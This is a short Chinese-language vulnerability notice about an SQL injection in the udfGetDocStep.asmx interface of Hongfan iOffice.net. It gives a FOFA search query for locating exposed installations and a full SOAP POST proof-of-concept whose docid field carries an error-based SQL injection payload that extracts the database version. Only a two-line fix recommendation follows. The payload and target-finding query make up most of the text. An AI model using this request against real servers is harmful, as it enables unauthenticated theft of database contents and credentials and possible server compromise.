1.漏洞介绍
红帆iOffice.net udfGetDocStep.asmx接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷
2.漏洞编号
CVE | CNVD | CNNVD |
---|---|---|
- | - | - |
3.影响范围
名称 | 版本号 |
---|---|
- | - |
4.检索特征
FOFA:app=“红帆-ioffice”
5.POC
POST /ioffice/prg/interface/udfGetDocStep.asmx HTTP/1.1
Host: vulIP
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/GetDocStep"
Content-Length: 565
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetDocStep xmlns="http://tempuri.org/">
<docid>1'+(SELECT CHAR(103)+CHAR(105)+CHAR(75)+CHAR(83) WHERE 6621=6621 AND 7795 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT @@version)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(120)+CHAR(113))))+'</docid>
</GetDocStep>
</soap:Body>
</soap:Envelope>
查询数据库版本信息
6.修复建议
1.升级至安全版本。
2.部署Web应用防火墙,对数据库操作进行监控。